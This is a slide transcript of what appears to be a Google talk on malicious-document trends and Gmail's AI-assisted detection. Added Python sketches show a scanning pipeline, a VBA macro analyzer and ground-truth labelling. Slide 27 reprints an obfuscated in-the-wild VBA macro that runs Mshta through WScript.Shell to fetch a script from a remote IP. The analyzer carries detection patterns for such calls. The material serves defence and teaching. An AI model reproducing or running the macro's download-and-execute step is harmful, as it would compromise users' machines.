HTA-T10 a Gmail Perspective Malicious Documents Trends...PDF: 2% Malicious Documents represent a...
Slide 1
Session ID: HTA-T10
Malicious Documents Trends: a Gmail Perspective
Google, @elie, with the help of many Googlers
Slide 3
In October 2019 the Russian-sponsored APT group Primitive Bear used obfuscated Office documents to target Ukrainian entities
https://www.anomali.com/files/white-papers/Anomali_Threat_Research-Gamaredon_TTPs_Target_Ukraine-WP.pdf
Slide 4
Malicious documents represent a significant part of the malware targeting our users
Office: 56%
PDF: 2%
Slide 5
Every week Gmail scans 300B+ attachments for malware
Slide 6
Each second we need to process millions of documents, each within a matter of milliseconds
Slides 7-10 (build-up of one diagram)
How Gmail malware detection works
Scanners
Decision engine
Policy engine
Slide 11
How about users and organizations at risk of targeted attacks?
Slide 12
Security sandboxes are used to supplement detection when needed.
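The scanners / decision engine / policy engine split from slides 7-10, together with the sandbox escalation that slide 12 reserves for at-risk users, sketched as a runnable toy pipeline. This is an added example, not Gmail's code and not code from the talk: the three scanners, their confidence values, the fusion thresholds, the OrgPolicy fields and the sample attachments are all assumptions made for illustration.

```python
from __future__ import annotations

import hashlib
from dataclasses import dataclass, field
from typing import Callable, Optional

# Toy model of the three layers named on the slides (scanners, decision
# engine, policy engine) plus an optional sandbox escalation. Added
# illustration, not Gmail's code: every scanner, threshold, policy field
# and sample attachment below is a constructed assumption.


@dataclass
class Attachment:
    name: str
    content: bytes
    sha256: str = field(init=False)

    def __post_init__(self) -> None:
        self.sha256 = hashlib.sha256(self.content).hexdigest()


@dataclass(frozen=True)
class Verdict:
    scanner: str
    malicious: bool
    confidence: float  # hypothetical 0..1 calibration of the scanner


# --- Scanners: cheap, independent, each gives its own opinion ---------------

# Constructed "known bad" list standing in for a signature database.
KNOWN_BAD_SHA256 = {hashlib.sha256(b"CONSTRUCTED KNOWN-BAD SAMPLE").hexdigest()}


def signature_scanner(att: Attachment) -> Verdict:
    hit = att.sha256 in KNOWN_BAD_SHA256
    return Verdict("signature", hit, 0.99 if hit else 0.0)


def heuristic_scanner(att: Attachment) -> Verdict:
    # Hypothetical rule: macro-capable file type plus an auto-run entry point.
    macro_type = att.name.lower().endswith((".docm", ".xlsm", ".doc", ".xls"))
    hit = macro_type and b"autoopen" in att.content.lower()
    return Verdict("heuristic", hit, 0.7 if hit else 0.0)


def ml_scanner(att: Attachment) -> Verdict:
    # Stand-in for a learned model: scores the density of obfuscation
    # primitives (string Replace calls, Chr()) in the document text.
    text = att.content.lower()
    score = min(1.0, (text.count(b"replace(") + text.count(b"chr(")) / 10)
    return Verdict("ml", score >= 0.5, score)


SCANNERS: list[Callable[[Attachment], Verdict]] = [
    signature_scanner, heuristic_scanner, ml_scanner]


# --- Decision engine: fuse the verdicts into one label ----------------------

def decide(verdicts: list[Verdict],
           sandbox: Optional[Callable[[], bool]] = None) -> str:
    """Return 'malicious', 'suspicious' or 'clean'.
    A single high-confidence hit is decisive; two agreeing scanners are
    decisive; a lone low-confidence hit is the uncertain band, resolved by
    a (slow) sandbox detonation when one is offered."""
    hits = [v for v in verdicts if v.malicious]
    if any(v.confidence >= 0.95 for v in hits) or len(hits) >= 2:
        return "malicious"
    if hits:
        if sandbox is not None:
            return "malicious" if sandbox() else "clean"
        return "suspicious"
    return "clean"


# --- Policy engine: turn the label into a per-organization action -----------

@dataclass(frozen=True)
class OrgPolicy:
    name: str
    targeted_risk: bool = False      # e.g. a government or finance tenant
    quarantine_suspicious: bool = False


def apply_policy(label: str, policy: OrgPolicy) -> str:
    if label == "malicious":
        return "block"
    if label == "suspicious":
        return "quarantine" if policy.quarantine_suspicious else "warn"
    return "deliver"


def scan_attachment(att: Attachment, policy: OrgPolicy,
                    sandbox: Optional[Callable[[], bool]] = None) -> dict:
    """Full pipeline for one attachment. The sandbox is only consulted for
    tenants flagged as at risk of targeted attacks, because detonation is
    far too slow to run on every document at the volumes the slides cite."""
    verdicts = [scan(att) for scan in SCANNERS]
    label = decide(verdicts, sandbox if policy.targeted_risk else None)
    return {
        "label": label,
        "action": apply_policy(label, policy),
        "hits": [v.scanner for v in verdicts if v.malicious],
    }


if __name__ == "__main__":
    generic = OrgPolicy("generic-tenant")
    gov = OrgPolicy("gov-tenant", targeted_risk=True)
    doc = Attachment("invoice.docm", b"Sub AutoOpen()\n  ' constructed\nEnd Sub")
    print(scan_attachment(doc, generic))                    # suspicious -> warn
    print(scan_attachment(doc, gov, sandbox=lambda: True))  # sandbox confirms -> block
```

The point of the split is that each layer changes independently: a new scanner is added without touching the fusion rule, the fusion thresholds are tuned without touching per-tenant policy, and the expensive sandbox only enters the path for tenants whose policy asks for it.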
Slide 13
Agenda
Who is targeted by malicious documents?
Deconstructing malicious document campaigns
Insights into Gmail next-gen detection
Slide 14
Who is targeted by malicious documents?
Slide 15
Every type of organization is at risk of being targeted by malicious documents
Education, Company, Not-for-profit, Government
Slide 16
Some organizations are more targeted by malicious documents than others
(chart by organization type: Education, Company, Not-for-profit, Government)
Slide 17
Some industries are more targeted by malicious documents than others
(chart by industry: Education, Finance & Insurance, Health Care, IT, Wholesale Trade, Retail, Real Estate, Manufacturing, Utilities, Transportation)
Slide 18
Prevalence of malicious documents varies drastically from country to country
(chart by country: Indonesia, Russia, Germany, India, Japan, France, USA, Finland, Great Britain, Norway)
Slide 19
Deconstructing malicious document campaigns
Slide 20
Cats through the ages
2000 BCE, 1200 CE, 1800 CE, 2020 CE
Slide 21
63% of the malicious docs blocked by Gmail are different from day to day
Slide 22
The volume of malicious documents varies greatly from day to day: a 3x variation is normal
Slide 23
Locky ransomware
Botnets are the culprits behind some of the massive bursts of malicious emails we observe. Necurs alone was sending 100M Locky samples per day in 2016
Slide 24
The malicious document threat landscape is very fast-paced and extremely adversarial
Slide 25
Kits offering weaponized document exploits packed with AV evasion techniques are routinely available on the black market as SaaS for $400-$5000
https://news.sophos.com/en-us/2019/02/14/old-phantom-crypter-upends-malicious-document-tools/?cmp=30728
Slide 26
What techniques do those kits use?
Slide 27
Obfuscated VBA macro (the real command string and object name are rebuilt at runtime through chains of Replace() calls, interleaved with junk arithmetic and junk string assignments):

boazuda = "zTpVrQQvHdVZWEzNCEvrDXMHhcjFYVxXIEEnuDCLMqpbjXqYf hcjFYVxXIEEnucjFYVxXIEEnup://104.144.207.201/cjFYVxXIEEnuron/WEzNCEvrDXMHcjFYVxXIEEnuiELOZqbRQzjYzTpVrQQvHdVZ.php?ucjFYVxXIEEnuzTpVrQQvHdVZDCLMqpbjXqYf=DCLMqpbjXqYfrniELOZqbRQzjY"
boazuda = Replace(boazuda, "zTpVrQQvHdVZ", "m")
boazuda = Replace(boazuda, "DCLMqpbjXqYf", "a")
dzkkGwK = "X" & "p" & "o"
boazuda = Replace(boazuda, "WEzNCEvrDXMH", "s")
AuOKypAOxXWC = "u" & "x" & Trim("G")
LrdizVw = 1418 + 1239 + 1546 + 521 + 1029
iBEFgGzg = 1766 + 1267 + 544 + 1840
boazuda = Replace(boazuda, "cjFYVxXIEEnu", "t")
boazuda = Replace(boazuda, "iELOZqbRQzjY", "e")
cYqOLzNGqSzN = 110 + 662 + 271 + 430 + 1818
IzdiuFFLcOWX = 1234 - 1771 - 1644 - 1187
boazuda = Replace(boazuda, "dfnAfNznHxFV", "l")
yCdrQfLG = "Z" & "y" & Trim("R") & "d"

loquaz = "WScripUEAOXJSPZOCg.ShwBfuroncKuUbkjJbOBuEpdFEkjJbOBuEpdFE"
loquaz = Replace(loquaz, "DgDdPEVxFMkH", "m")
OFNCRKqKF = 1006 + 15 + 215
loquaz = Replace(loquaz, "rTRMGUvpLYHv", "a")
TOxTXxovMuOp = 734 + 33 + 1188 + 563 + 716
loquaz = Replace(loquaz, "AdoqkZxrLcFX", "s")
loquaz = Replace(loquaz, "UEAOXJSPZOCg", "t")
QFMdIPpUYY = 459 - 943 - 977
AUvwcPXcwXb = "E" & "Q"
loquaz = Replace(loquaz, "wBfuroncKuUb", "e")
iqEyuLuf = "D" & "A" & Trim("O")
loquaz = Replace(loquaz, "kjJbOBuEpdFE", "l")
uRxRWUfRpSX = Trim("G") & "k" & Trim("G") & Trim("I")

jXkIrzM = 128 - 1507 - 70
XjnfDLLd = Trim("k") & "o" & "p"

CreateObject(loquaz).Run boazuda, 0

FAcDNuSZHuWp = 1892 - 994 - 435 - 958 - 491 - 1652 - 1245
NbnCVgoojDpO = 1069 + 1656 + 957 + 714
CDDQFoi = 512 + 1320
zCwcBZPYSpI = 1011 - 1218 - 830 - 1495 - 300 - 1268 - 860

Decoded on the slide:
boazuda -> Mshta http://104.144.xxx.yyy/tron/stem.php
loquaz -> WScript.shell
Slide 28
Attackers try to evade detection by hiding the malicious payload in XLS cell contents and reassembling it from the macro:

q = "": m = ""
For i = use * 2 To use * 2 + 3
    q = q + plumb(Cells(i, use * 2)): m = m + plumb(Cells(i + use / 2, use * 2))
Next i
Shell q + cop(use, use) + m, ..
Slide 29
Takeaways
63% of malware is different from day to day
Obfuscators and weaponized exploits are readily available
Slide 30
Insights into Gmail next-gen malicious document detection
Slide 31
Use AI to improve detection
Slide 32
Really?
Slide 33
Enhance existing detection capabilities with AI interpolation and advanced document analyzers to improve coverage and resilience to adversarial attacks
Slide 34
Gmail detection landscape: today
(diagram labels: APT / 0day, Advanced obfuscation, Bulk malware, Detection TCO, Defense GAP / opportunity)
Slide 35
Gmail detection landscape: tomorrow
(same diagram; the region previously labelled Defense GAP / opportunity is now labelled AI)
Slide 36
How does it work in practice?
Slide 37
Anatomy of a document scanner
Document analyzer
Feature extractors
Macro/script parsers
Macro AST analyzer
Transpiler
Supervised execution
Feedback loop for dynamic code (eval)
Machine learning
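An added example, not code from the talk or from Gmail's scanner, of the parser, partial-evaluation and feature stages named on slide 37, applied to the two evasion patterns from slides 27 and 28: a Replace()-chain obfuscation that hides a Mshta / WScript.Shell launch, and a command assembled from XLS cell contents. The VBA subset it understands, the indicator list and weights, the verdict thresholds and the three sample macros are my assumptions; the host name example.invalid in the sample is a constructed placeholder, not an indicator from the talk.

```python
from __future__ import annotations

import re

# Added illustration of "macro parser -> partial evaluation -> indicator
# features -> score". Not Gmail's scanner: the grammar subset, indicator
# list, weights, thresholds and sample macros are all assumptions.


def split_outside_quotes(text: str, sep: str) -> list[str]:
    """Split on sep, ignoring occurrences inside VBA string literals."""
    parts, cur, in_quote = [], [], False
    for ch in text:
        if ch == '"':
            in_quote = not in_quote
        if ch == sep and not in_quote:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return parts


def statements(macro: str):
    """Yield one VBA statement at a time (':' separates statements on a line)."""
    for line in macro.splitlines():
        for stmt in split_outside_quotes(line, ":"):
            stmt = stmt.strip()
            if stmt and not stmt.startswith("'"):
                yield stmt


ASSIGN = re.compile(r"^(\w+)\s*=\s*(.+)$")
REPLACE = re.compile(r'^Replace\(\s*(\w+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)$', re.I)
TRIM = re.compile(r'^Trim\(\s*"([^"]*)"\s*\)$', re.I)
LITERAL = re.compile(r'^"([^"]*)"$')


def eval_string_expr(expr: str, env: dict) -> str | None:
    """Evaluate literals, Trim("..") and & concatenation. Returns None when
    anything else appears (numbers, unknown calls), so junk arithmetic and
    cell lookups are simply left unevaluated."""
    out = []
    for piece in split_outside_quotes(expr, "&"):
        piece = piece.strip()
        if m := LITERAL.match(piece):
            out.append(m.group(1))
        elif m := TRIM.match(piece):
            out.append(m.group(1).strip())
        elif piece in env:
            out.append(env[piece])
        else:
            return None
    return "".join(out)


def simulate(macro: str) -> dict:
    """Partially evaluate the string-building statements: a static stand-in
    for the slide's feedback loop from supervised execution back into analysis."""
    env: dict = {}
    for stmt in statements(macro):
        m = ASSIGN.match(stmt)
        if not m:
            continue
        name, rhs = m.group(1), m.group(2).strip()
        if (r := REPLACE.match(rhs)) and r.group(1) in env:
            env[name] = env[r.group(1)].replace(r.group(2), r.group(3))
        elif (val := eval_string_expr(rhs, env)) is not None:
            env[name] = val
    return env


# Indicators are matched against the raw macro AND the resolved strings, so a
# command hidden behind Replace() chains is still seen. Weights are assumptions.
INDICATORS = {
    "wscript_shell": (re.compile(r"wscript\.shell", re.I), 3),
    "mshta":         (re.compile(r"\bmshta\b", re.I), 3),
    "shell_exec":    (re.compile(r"^\s*Shell\s+\S", re.I | re.M), 3),
    "createobject":  (re.compile(r"CreateObject\(", re.I), 1),
    "url":           (re.compile(r"https?://\S+", re.I), 1),
    # a string built by concatenating cell contents: q = q + f(Cells(..));
    # a plain Cells(..).Value write does not match, to avoid over-generalising
    "cell_assembly": (re.compile(r"=\s*\w+\s*[+&]\s*\w*\(?\s*Cells\(", re.I), 2),
}
WEIGHTS = {name: w for name, (_, w) in INDICATORS.items()}
WEIGHTS.update(replace_chain=2, junk_arithmetic=1)
JUNK_ARITH = re.compile(r"^\s*\w+\s*=\s*-?\d+(?:\s*[+-]\s*\d+)+\s*$", re.M)
RUN_CALL = re.compile(r"CreateObject\(\s*(\w+)\s*\)\.Run\s+(\w+)", re.I)


def analyze_macro(macro: str) -> dict:
    env = simulate(macro)
    haystack = macro + "\n" + "\n".join(env.values())
    found = {name for name, (pat, _) in INDICATORS.items() if pat.search(haystack)}
    if macro.lower().count("replace(") >= 3:
        found.add("replace_chain")
    if len(JUNK_ARITH.findall(macro)) >= 3:
        found.add("junk_arithmetic")
    score = sum(WEIGHTS[f] for f in found)
    invocation = None
    if m := RUN_CALL.search(macro):
        invocation = f"{env.get(m.group(1), m.group(1))}.Run {env.get(m.group(2), m.group(2))}"
    return {"indicators": sorted(found), "score": score, "invocation": invocation,
            "verdict": "malicious" if score >= 5 else "suspicious" if score >= 2 else "clean",
            "resolved": env}


# Constructed samples mirroring the two slide patterns (placeholder host).
SAMPLE_OBFUSCATED = '''
cmd = "ZZZZshYYYYa hYYYYYYYYp://example.invalid/stage.php"
junk1 = 1418 + 1239 + 1546
cmd = Replace(cmd, "ZZZZ", "m")
noise = "X" & "p" & Trim(" o ")
junk2 = 1766 + 1267 - 544
cmd = Replace(cmd, "YYYY", "t")
obj = "WScripYYYY.Shell"
junk3 = 110 - 662 + 271
obj = Replace(obj, "YYYY", "t")
CreateObject(obj).Run cmd, 0
'''
SAMPLE_CELLS = '''
q = "": m = ""
For i = use * 2 To use * 2 + 3
    q = q + plumb(Cells(i, use * 2)): m = m + plumb(Cells(i + use / 2, use * 2))
Next i
Shell q + m, 0
'''
SAMPLE_BENIGN = '''
Sub FormatReport()
    Cells(1, 1).Value = "Quarterly total"
    MsgBox "Done"
End Sub
'''

if __name__ == "__main__":
    for name, sample in [("obfuscated", SAMPLE_OBFUSCATED), ("cells", SAMPLE_CELLS), ("benign", SAMPLE_BENIGN)]:
        print(name, analyze_macro(sample))
```

Two design points: the simulator only evaluates a tiny, side-effect-free subset of VBA, so the numeric junk and the Cells() lookups fall through harmlessly, and the cell-assembly indicator requires concatenation rather than any Cells() reference, which is the kind of narrowing slide 44's ".dll" example argues for.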
Slide 38
How our AI scanner integrates with Gmail malware detection
Scanners (the AI scanner is one of them)
Decision engine
Policy engine
Slide 39
Does it really work?
Slide 40
The AI scanner increases detection of malicious Office documents by ~10% consistently and 150+% at peak
(chart: daily detection gain from Jan 28 to Feb 24; series: AI only, Both, Other scanners only; y-axis 0% to 200%)
Slide 41
Improvement varies by file type
(chart values: 10.5% and 14.5%; the file-type labels were not recoverable from the transcript)
Slide 42
How do you build ground truth?
Slide 43
No silver bullet: use a multi-pronged approach
Hindsight sample re-evaluation: re-scan documents at a later stage to give the various scanners a chance to have their false positives fixed
Additional sandbox scans: scan suspicious documents, and a large subset of all documents, with sandboxes for additional verdicts
Cluster analysis: leverage deep clustering to quickly identify the samples that need to be reviewed to find potential FP / FN
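An added example, not the talk's tooling, of how the three ground-truth sources on slide 43 can be combined over a batch of scan records: a precedence rule for the hindsight label, a pass that extracts verdict flips as FP/FN candidates, and a per-cluster consistency check that queues outliers for human review. The record layout, the sandbox > re-scan > initial precedence, the cluster ids (standing in for the output of a deep-clustering model) and the records themselves are constructed.

```python
from __future__ import annotations

from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Optional

# Added illustration of hindsight re-scan + sandbox verdicts + cluster review.
# Not Gmail's tooling: record layout, precedence rule and data are assumptions.


@dataclass(frozen=True)
class Record:
    sample_id: str
    cluster: str                   # id from a (hypothetical) deep-clustering step
    initial: str                   # verdict at delivery time: "malicious" / "clean"
    rescan: Optional[str] = None   # hindsight verdict from a later re-scan
    sandbox: Optional[str] = None  # verdict from detonation, if it was sandboxed


def hindsight_label(r: Record) -> str:
    """Most trusted verdict available: sandbox, then re-scan, then initial."""
    return r.sandbox or r.rescan or r.initial


def verdict_flips(records: list[Record]) -> list[tuple[str, str]]:
    """Samples whose hindsight label contradicts the delivery-time verdict:
    FP = blocked then cleared, FN = delivered then found malicious."""
    flips = []
    for r in records:
        if hindsight_label(r) != r.initial:
            flips.append((r.sample_id, "FP" if r.initial == "malicious" else "FN"))
    return flips


def cluster_review_queue(records: list[Record]) -> list[dict]:
    """Within a cluster the labels should agree; members that disagree with
    the cluster majority are the cheapest place to look for remaining FP/FN.
    Returns clusters ordered by disagreement rate, most inconsistent first."""
    by_cluster: dict[str, list[Record]] = defaultdict(list)
    for r in records:
        by_cluster[r.cluster].append(r)
    queue = []
    for cid, members in by_cluster.items():
        labels = Counter(hindsight_label(r) for r in members)
        majority = labels.most_common(1)[0][0]
        outliers = [r.sample_id for r in members if hindsight_label(r) != majority]
        if outliers:
            queue.append({"cluster": cid, "majority": majority, "size": len(members),
                          "review": outliers,
                          "disagreement": len(outliers) / len(members)})
    queue.sort(key=lambda q: (-q["disagreement"], q["cluster"]))
    return queue


# Constructed records. Cluster "dll-strings" mirrors the slide-44 story of a
# model over-generalising on ".dll" appearing in code: most members were later
# re-scanned clean, one was never re-scanned and still carries the old verdict.
SAMPLE_RECORDS = [
    Record("a1", "dll-strings", "malicious", rescan="clean"),
    Record("a2", "dll-strings", "clean"),
    Record("a3", "dll-strings", "clean"),
    Record("a4", "dll-strings", "malicious"),
    Record("b1", "loader-family", "malicious", sandbox="malicious"),
    Record("b2", "loader-family", "malicious", sandbox="malicious"),
    Record("b3", "loader-family", "malicious"),
    Record("b4", "loader-family", "clean", sandbox="malicious"),
    Record("c1", "invoice-template", "clean", rescan="clean"),
    Record("c2", "invoice-template", "clean"),
    Record("d1", "mixed-macro", "clean"),
    Record("d2", "mixed-macro", "clean", rescan="clean"),
    Record("d3", "mixed-macro", "malicious"),
]

if __name__ == "__main__":
    print(verdict_flips(SAMPLE_RECORDS))
    for entry in cluster_review_queue(SAMPLE_RECORDS):
        print(entry)
```

The review queue is what makes the approach scale: a reviewer looks at one outlier per inconsistent cluster (a4, d3) rather than at every sample, and a corrected label can then be propagated to the whole cluster before the model is retrained.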
Slide 44
Deep clustering to scale model improvements
Example of an incorrect extrapolation: ".dll" appearing in code was considered malicious
Slide 45
Takeaways
Malicious documents are a key threat to businesses and end users
Adversaries continuously shift their TTPs and tweak their payloads to avoid detection
Robust malicious document detection requires a defense-in-depth strategy that combines detection approaches
Slide 46
Robust malicious document detection requires combining technologies and constant R&D
https://elie.net/rsa20
Slide 47
Thank you